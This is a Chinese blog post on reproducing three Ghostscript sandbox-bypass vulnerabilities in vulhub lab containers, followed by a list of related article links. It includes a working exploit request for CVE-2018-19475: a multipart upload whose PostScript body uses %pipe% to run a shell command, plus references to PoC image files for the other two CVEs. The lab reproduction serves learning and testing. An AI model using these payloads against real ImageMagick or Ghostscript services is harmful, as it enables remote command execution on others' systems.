vulhub漏洞复现十七_GhostScript
前言
Ghostscript是一套建基于Adobe、PostScript及可移植文档格式(PDF)的页面描述语言等而编译成的免费软件
一、 CVE-2018-16509_GhostScript 沙箱绕过(命令执行)漏洞
漏洞原理
8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞:
GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。
环境搭建
执行如下命令启动漏洞环境(其中包括最新版 GhostScript 9.23、ImageMagick 7.0.8):
```
docker-compose up -d
```
环境启动后,访问`http://your-ip:8080`将可以看到一个上传组件。
漏洞利用
上传[poc.png](poc.png),将执行命令`id > /tmp/success && cat /tmp/success`。此时进入容器`docker-compose exec web bash`,将可以看到/tmp/success已被创建:
二、 CVE-2018-19475_GhostScript 沙箱绕过(命令执行)漏洞
漏洞原理
2018年底来自Semmle Security Research Team的Man Yue Mo发表了CVE-2018-16509漏洞的变体CVE-2018-19475,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。
漏洞环境
执行如下命令启动漏洞环境(其中包括 GhostScript 9.25、ImageMagick 7.0.8-20):
```
docker-compose up -d
```
环境启动后,访问`http://your-ip:8080`将可以看到一个上传组件。
漏洞利用
将POC作为图片上传,执行命令`id > /tmp/success && cat /tmp/success`:
```
POST /index.php HTTP/1.1
Host: target
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryukZmnyhO
Content-Length: 279
------WebKitFormBoundaryukZmnyhO
Content-Disposition: form-data; name="file_upload"; filename="1.jpg"
content-Type="image/png"
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file
------WebKitFormBoundaryukZmnyhO--
```
命令已成功执行:
当然,真实环境下通常无法直接回显漏洞执行结果,你需要使用带外攻击的方式来检测漏洞。
三、 CVE-2019-6116_GhostScript 沙箱绕过(命令执行)漏洞
漏洞原理
2019年1月23日晚,Artifex官方在ghostscriptf的master分支上提交合并了多达6处的修复。旨在修复 CVE-2019-6116 漏洞,该漏洞由 Google 安全研究员 Tavis 于2018年12月3日提交。该漏洞可以直接绕过 ghostscript 的安全沙箱,导致攻击者可以执行任意命令/读取任意文件。
GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。
漏洞环境
执行如下命令启动漏洞环境(其中包括最新版 GhostScript 9.26、ImageMagick 7.0.8-27):
```
docker-compose up -d
```
环境启动后,访问`http://your-ip:8080`将可以看到一个上传组件。
漏洞利用
作者给出了[POC](poc.png),上传这个文件,即可执行`id > /tmp/success`:
也可以用``docker run -it --rm --name uu -v `pwd`/poc.png:/tmp/poc.png vulhub/imagemagick:7.0.8-27-php identify /tmp/poc.png``来直接测试poc:
vulhub漏洞复现十七_GhostScript相关推荐
- docker kali安装mysql_kali安装docker(有效详细的教程) ——vulhub漏洞复现 001
前记: 博主有着多次安装docker的丰富经验,曾经为了在kali成功安装docker花费不少时间.在kali2016.3一直到最新的kali2019.4都通吃!所以跟着下面的步骤走,绝对不会出错.( ...
- vulhub漏洞复现之bash(Shellshock CVE-2014-6271)
Shellshock 破壳漏洞 CVE-2014-6271 1.漏洞概述: GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此 ...
- vulhub漏洞复现37_Liferay
CVE-2020-7961_Liferay Portal CE 反序列化命令执行漏洞 漏洞详情 Liferay Portal CE是一款用来快速构建网站的开源系统.其7.2.0 GA1及以前的版本AP ...
- vulhub漏洞复现-bash(CVE-2014-6271) shellshock-破壳漏洞
漏洞简介 破壳漏洞(shellshock),也被称为bashdoor,是广泛使用的Unix shell中的一系列安全漏洞,其中第一个漏洞于2014年9月24日被披露.许多面向互联网的服务,如一些网络服 ...
- [ vulhub漏洞复现篇 ] Apereo-cas 4.1 反序列化远程代码执行漏洞
- [ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-16509
- [ vulhub漏洞复现篇 ] Jetty WEB-INF 文件读取复现CVE-2021-34429
- [ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入
- [ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
- 渗透测试-----信息收集(概述、whois、子域名查询、爆破、vulhub域名传送漏洞复现、kali安装docker)
文章目录 渗透测试 信息收集 1. 概述 2. 供练手的网站 3. whois查询 4. 子域名查询 域传送漏洞 1. 概述 2. 解决办法 3. vulhub漏洞复现 4. 子域名爆破 渗透测试 信 ...
最新文章
- ACMNO.49:一元三次方程求解(主要就是精度问题)
- 【Https异常】This request has been blocked; the content must be served over HTTPS
- 【BZOJ 3747】 3747: [POI2015]Kinoman (线段树)
- session的存储方式
- php动态数组的用法
- 从一个实例看编程水平的步步提高
- 不使用总线矩阵的CortexM3最小系统搭建(AHB外设有ITCM,DTCM,DEFAULT_SLAVE和AHB_APB桥,APB外设只有一个UART)附整个工程
- GridView实现CheckBox全选
- 算法-codeup1928-日期差值
- 友勤签约中芝软件系统(上海)有限公司Oracle Crystal Ball Suite软件项目
- pyecharts基础图表汇总(三国演义可视化)
- 计算机中缺失freeimage.dll,修复freeimage.dll
- 金融用计算机,CFA考试指定计算器使用攻略
- w10连接远程计算机控制,Win10远程桌面连接如何开启,3种方式助你远程控制
- (超详细)张正友标定法原理及公式推导
- Nginx事件管理之epoll模块
- vue导入音乐_vue-music:添加歌曲到队列add-song.vue
- 贸易合规服务市场现状研究分析报告 -
- 交大研究生去日本签证攻略
- 2021安防视频监控运维市场回顾和展望